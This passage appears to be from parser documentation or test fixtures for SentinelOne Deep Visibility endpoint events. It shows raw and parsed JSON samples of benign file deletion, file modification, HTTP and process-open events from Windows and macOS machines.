(21G83)\",\"computerName\":\"MAC12345678\",\"machineType\":\"laptop\",\"mgmtUrl\":\"https://euce1-103.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1661503902148\"},\"event_type\":\"fileDeletion\",\"trueContext\":{\"key\":{\"value\":\"DD4C9404-F0D8-4676-84A6-5AAE17DE60ED\"}},\"source\":{\"node\":{\"key\":{\"value\":\"27902FA0-0C08-475E-81CA-26A092441368\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"1BF67724-45F1-4B37-AE75-33B8E8CB8717\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1658821170000\"},\"path\":\"/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint\",\"pUnix\":\"493\",\"owner\":{\"name\":\"user.name\"},\"sizeBytes\":\"61090952\",\"signature\":{\"unsigned\":{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{\"sha1\":\"88bd62f8a3ee159d4f4611b324073d1e56ef76de\",\"sha256\":\"03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f\",\"md5\":\"7180a848026de2bef01fb7383bd03ba0\"},\"fileLocation\":\"Local\"},\"commandLine\":\"/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml 
/Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide\",\"fullPid\":{\"pid\":6933,\"startTime\":{\"millisecondsSinceEpoch\":\"1661503902034\"}},\"user\":{\"name\":\"user.name\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"79B3CD05-F827-45CB-A898-B647D8409A3D\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"swiftlint\",\"root\":\"E_FALSE\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"DD4C9404-F0D8-4676-84A6-5AAE17DE60ED\"}}},\"targetFile\":{\"node\":{\"key\":{\"value\":\"024A7D89-2663-48AF-9DF4-C95494454E37\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1661503902152\"},\"path\":\"/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist\",\"owner\":{},\"isKernelModule\":\"E_FALSE\",\"hashes\":{}}}\n\n", - "event": { - "action": "fileDeletion", - "start": "2022-08-26T08:51:42.148000Z" - }, - "agent": { - "version": "S1-MAC/22.2.3.6268" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-103.sentinelone.net", - "trace_id": "D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1", - "uuid": "81A8A777-22BD-5CF8-9BF1-FD05875D9CD5" - }, - "event": { - "type": "fileDeletion" - }, - "file": { - "node": { - "key": "024A7D89-2663-48AF-9DF4-C95494454E37" - } - }, - "host": { - "os": { - "revision": "12.5.1 (21G83)" - } - }, - "process": { - "excluded": "E_FALSE", - "executable": { - "name": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "node": { - "key": "1BF67724-45F1-4B37-AE75-33B8E8CB8717" - }, - "size_bytes": "61090952", - "start": "2022-07-26T07:39:30.000000Z" - }, - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": 
"27902FA0-0C08-475E-81CA-26A092441368" - }, - "parent": { - "node": { - "key": "79B3CD05-F827-45CB-A898-B647D8409A3D" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "true_context": { - "key": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "file": { - "created": "2022-08-26T08:51:42.152000Z", - "directory": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy", - "name": "ff558ca8ac21977f6850e3a3a719ed4f.plist", - "path": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist" - }, - "host": { - "name": "MAC12345678", - "os": { - "family": "osx", - "name": "OS X" - }, - "type": "laptop" - }, - "process": { - "command_line": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml /Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide", - "executable": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "hash": { - "md5": "7180a848026de2bef01fb7383bd03ba0", - "sha1": "88bd62f8a3ee159d4f4611b324073d1e56ef76de", - "sha256": "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f" - }, - "name": "swiftlint", - "pid": 6933, - "start": "2022-08-26T08:51:42.034000Z", - "title": "swiftlint" - }, - "related": { - "hash": [ - "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f", - "7180a848026de2bef01fb7383bd03ba0", - 
"88bd62f8a3ee159d4f4611b324073d1e56ef76de" - ], - "user": [ - "user.name" - ] - }, - "user": { - "name": "user.name" - } - } - - ``` - - -=== "file_modification.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFJC477DKY75XNH1KZPNVR44\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630506789\"}, \"event_type\": \"fileModification\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"B3B1945F1C32FBE0\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8\", \"fullPid\": {\"pid\": 17924, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516877934\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": 
\"0D7A69B0C2C26E73\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"moduleLoad\": 237, \"fileCreation\": 15609, \"fileDeletion\": 10968, \"fileModification\": 25519, \"netConnOut\": 7312, \"dnsLookups\": 5131}}, \"file\": {\"node\": {\"key\": {\"value\": \"11B30D7B6C017731\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631630506782\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\TransportSecurity\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"isKernelModule\": \"E_FALSE\", \"hashes\": {}, \"oldHashes\": {}}", - "event": { - "action": "fileModification", - "start": "2021-09-14T14:41:46.789000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFJC477DKY75XNH1KZPNVR44", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 5131, - "file_creation": 15609, - "file_deletion": 10968, - "file_modification": 25519, - "module_load": 237, - "net_conn_out": 7312 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - 
"interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "B3B1945F1C32FBE0" - }, - "parent": { - "node": { - "key": "0D7A69B0C2C26E73" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "true_context": { - "key": "6B188EE5E8C5F24F" - } - }, - "file": { - "created": "2021-09-14T14:41:46.782000Z", - "extension": "CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity", - "name": "TransportSecurity", - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 17924, - "start": "2021-09-13T07:07:57.934000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== 
"file_modification2.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"123\",\"traceId\":\"123\",\"agentVersion\":\"S1-WIN/21.7.7.40005\",\"osFamily\":\"windows\",\"osName\":\"Windows Server 2019 Datacenter\",\"osRevision\":\"17763\",\"computerName\":\"123\",\"machineType\":\"server\",\"mgmtUrl\":\"https://foo.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1660727671759\"},\"event_type\":\"fileModification\",\"trueContext\":{\"key\":{\"value\":\"07CF4F73FE08319F\"}},\"source\":{\"node\":{\"key\":{\"value\":\"AB20B9FDBC53D9F5\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"5B336EB7F6C58E57\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"18446732429235951616\"},\"path\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"owner\":{},\"isDir\":\"E_FALSE\",\"sizeBytes\":\"26624\",\"signature\":{\"signed\":{\"identity\":\"MICROSOFT WINDOWS\",\"valid\":{}}},\"hashes\":{\"sha1\":\"447ec979c4b2c53c21b17bd9c2f7d67a9f967108\",\"sha256\":\"1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b\",\"md5\":\"0406e327338ccea5ef7dcf58268a8bfe\"},\"fileLocation\":\"Local\"},\"commandLine\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"STATISTIQUES\\\" -v \\\"v4.0\\\" -l \\\"webengine4.dll\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\STATISTIQUES\\\\STATISTIQUES.config\\\" -w \\\"\\\" -m 0 -t 20 -ta 0\",\"fullPid\":{\"pid\":3748,\"startTime\":{\"millisecondsSinceEpoch\":\"1660716764710\"}},\"user\":{\"name\":\"123\\\\foo.statistiques\",\"sid\":\"S-1-5-21-4154652123-1702891081-745747720-13627\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"38A3CC9C5229D1BD\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"IIS Worker 
Process\",\"root\":\"E_TRUE\",\"subsystem\":\"SYS_WIN32\",\"integrityLevel\":\"HIGH\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"07CF4F73FE08319F\"}},\"counters\":{\"moduleLoad\":5585,\"fileCreation\":1960,\"fileDeletion\":34,\"fileModification\":4055,\"netConnOut\":96,\"dnsLookups\":72}},\"file\":{\"node\":{\"key\":{\"value\":\"CA4F23B11D816C71\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1660727671758\"},\"path\":\"Anonymized Data\",\"owner\":{},\"isDir\":\"E_FALSE\",\"sizeBytes\":\"1075\",\"hashes\":{\"sha1\":\"9045966e5e375754d7789d487996d0314b5f77e1\",\"sha256\":\"28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d\",\"md5\":\"2e63349a674acda41d8e1dcbff91b209\"},\"fileLocation\":\"Local\"},\"sizeBytes\":\"1075\",\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"oldHashes\":{}}\n", - "event": { - "action": "fileModification", - "start": "2022-08-17T09:14:31.759000Z" - }, - "agent": { - "version": "S1-WIN/21.7.7.40005" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://foo.sentinelone.net", - "trace_id": "123", - "uuid": "123" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "17763" - } - }, - "process": { - "counters": { - "dns_lookups": 72, - "file_creation": 1960, - "file_deletion": 34, - "file_modification": 4055, - "module_load": 5585, - "net_conn_out": 96 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "node": { - "key": "5B336EB7F6C58E57" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "26624", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "AB20B9FDBC53D9F5" - }, - 
"parent": { - "node": { - "key": "38A3CC9C5229D1BD" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "07CF4F73FE08319F" - }, - "user": { - "sid": "S-1-5-21-4154652123-1702891081-745747720-13627" - } - }, - "true_context": { - "key": "07CF4F73FE08319F" - } - }, - "file": { - "created": "2022-08-17T09:14:31.758000Z", - "extension": "Anonymized Data", - "hash": { - "md5": "2e63349a674acda41d8e1dcbff91b209", - "sha1": "9045966e5e375754d7789d487996d0314b5f77e1", - "sha256": "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d" - }, - "name": "Anonymized Data", - "path": "Anonymized Data", - "size": 1075 - }, - "host": { - "name": "123", - "os": { - "family": "windows", - "name": "Windows Server 2019 Datacenter" - }, - "type": "server" - }, - "process": { - "command_line": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"STATISTIQUES\" -v \"v4.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \"C:\\inetpub\\temp\\apppools\\STATISTIQUES\\STATISTIQUES.config\" -w \"\" -m 0 -t 20 -ta 0", - "executable": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "hash": { - "md5": "0406e327338ccea5ef7dcf58268a8bfe", - "sha1": "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "sha256": "1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b" - }, - "name": "w3wp.exe", - "pid": 3748, - "start": "2022-08-17T06:12:44.710000Z", - "title": "IIS Worker Process", - "working_directory": "C:\\Windows\\System32\\inetsrv" - }, - "related": { - "hash": [ - "0406e327338ccea5ef7dcf58268a8bfe", - "1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b", - "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d", - "2e63349a674acda41d8e1dcbff91b209", - "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "9045966e5e375754d7789d487996d0314b5f77e1" - ], - "user": [ - "123\\foo.statistiques" - ] - }, - "user": { - "id": "S-1-5-21-4154652123-1702891081-745747720-13627", - "name": "123\\foo.statistiques" - } - } - - ``` - - -=== 
"http.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 1, \"uuid\": \"3d923fd8f09b44f4973579043a3c8df3\", \"traceId\": \"33AEAAEA73CD4989976C65DA8123C361\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-TECH10\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631784929904\"}, \"event_type\": \"http\", \"trueContext\": {\"key\": {\"value\": \"A1FFB5A30161CDC0\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"28C500988B415CA1\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"96C577BBA6378545\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"42156856\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT CORPORATION\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"676b4e6a3c2c06fd7df3b83527a5570fd6687c8f\", \"sha256\": \"97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1\", \"md5\": \"bafa8a3a020648b57622e0b79104468a\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\\\"\", \"fullPid\": {\"pid\": 14144, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775730819\"}}, \"user\": {\"name\": \"CORP\\\\m.benyounes\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6195\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"8299EFA6DE45855B\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Microsoft Outlook\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": 
\"A1FFB5A30161CDC0\"}}, \"counters\": {\"modelChildProcess\": 4, \"osChildProcess\": 2, \"moduleLoad\": 4102, \"fileCreation\": 522, \"fileDeletion\": 441, \"fileModification\": 1211, \"netConnOut\": 235, \"registryModification\": 7596, \"dnsLookups\": 81}}, \"sourceType\": \"WININET\", \"url\": \"https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag\", \"method\": \"GET\"}", - "event": { - "action": "http", - "start": "2021-09-16T09:35:29.904000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 1, - "trace_id": "33AEAAEA73CD4989976C65DA8123C361", - "uuid": "3d923fd8f09b44f4973579043a3c8df3" - }, - "event": { - "type": "http" - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "dns_lookups": 81, - "file_creation": 522, - "file_deletion": 441, - "file_modification": 1211, - "model_child_process": 4, - "module_load": 4102, - "net_conn_out": 235, - "os_child_process": 2, - "registry_modification": 7596 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "node": { - "key": "96C577BBA6378545" - }, - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION" - } - }, - "size_bytes": "42156856", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "28C500988B415CA1" - }, - "parent": { - "node": { - "key": "8299EFA6DE45855B" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "A1FFB5A30161CDC0" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6195" - } - }, - "true_context": { - "key": "A1FFB5A30161CDC0" - } - }, - "host": { - "name": "LAPTOP-TECH10", - "os": { - "family": "windows", - 
"name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "http": { - "request": { - "method": "GET" - } - }, - "process": { - "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"", - "executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "hash": { - "md5": "bafa8a3a020648b57622e0b79104468a", - "sha1": "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "sha256": "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1" - }, - "name": "OUTLOOK.EXE", - "pid": 14144, - "start": "2021-09-16T07:02:10.819000Z", - "title": "Microsoft Outlook", - "working_directory": "C:\\Program Files\\Microsoft Office\\root\\Office16" - }, - "related": { - "hash": [ - "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1", - "bafa8a3a020648b57622e0b79104468a" - ], - "user": [ - "CORP\\m.benyounes" - ] - }, - "url": { - "domain": "automation.alticap.com", - "fragment": "frag", - "original": "https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag", - "path": "/media/images/1548943185788.jpg", - "port": 443, - "query": "foo=bar", - "registered_domain": "alticap.com", - "scheme": "https", - "subdomain": "automation", - "top_level_domain": "com" - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6195", - "name": "CORP\\m.benyounes" - } - } - - ``` - - -=== "open_process.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 63, \"uuid\": \"bcc4bf7a284441599707050e1d58a8dd\", \"traceId\": \"CEBBC94D38B041B1B2DE01C315EB28F5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH15\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634712102\"}, \"event_type\": \"openProcess\", \"source\": {\"node\": {\"key\": {\"value\": 
\"2A2CC1C3468CB3D8\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"1F70F08D24687577\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"59448\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce\", \"sha256\": \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\", \"md5\": \"15a556def233f112d127025ab51ac2d3\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\", \"fullPid\": {\"pid\": 992, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919462523\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"611EAD3E998CF40A\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"E2ABEBDC5F08F279\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\wininit.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"419432\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"915ea28bdaa9a2230ce52080693d7f7e27620ed5\", \"sha256\": \"268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86\", \"md5\": \"9ef51c8ad595c5e2a123c06ad39fccd7\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"wininit.exe\", \"fullPid\": {\"pid\": 900, \"startTime\": {\"millisecondsSinceEpoch\": \"1630919462470\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"0D332A871A7DB912\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Windows Start-Up Application\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", 
\"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"5318E7F038459CED\"}}}, \"excluded\": \"E_FALSE\", \"name\": \"Local Security Authority Process\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"A2DC49811AF8CC72\"}}, \"counters\": {\"crossProcess\": 5262, \"moduleLoad\": 222, \"netConnOut\": 1813, \"crossProcessOutOfGroup\": 5262, \"crossProcessOpenProcess\": 5262, \"dnsLookups\": 51}}, \"target\": {\"node\": {\"key\": {\"value\": \"E94742BA9CF1A186\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"23FF6C2F651EEA11\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", 